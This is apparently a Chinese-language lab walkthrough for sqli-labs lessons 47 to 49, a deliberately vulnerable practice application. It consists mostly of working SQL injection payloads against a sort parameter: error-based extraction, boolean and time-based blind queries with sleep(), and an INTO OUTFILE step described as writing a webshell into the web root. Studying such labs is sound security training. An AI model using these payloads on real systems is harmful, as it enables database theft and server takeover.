0x1 源码区别点
将id变为字符型:
$sql = "SELECT * FROM users ORDER BY '$id'";
0x2实例测试
(1)and rand相结合的方式
payload: http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+
(2)利用报错的方式进行
http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+
网上摘录语句:
http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+
(3)另类报错语句
http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+
(4)延迟注入
http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+
(5)使用into outfile导出文件
http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt"
进行网马写入
后面的十六进制是<? php phpinfo();?>
0x3第四十八关
这关和第四十七关的区别在于没有报错信息,也可以采用into outfile
http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+
0x4第四十九关
这关和第四十七关的区别在于没有报错信息
http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+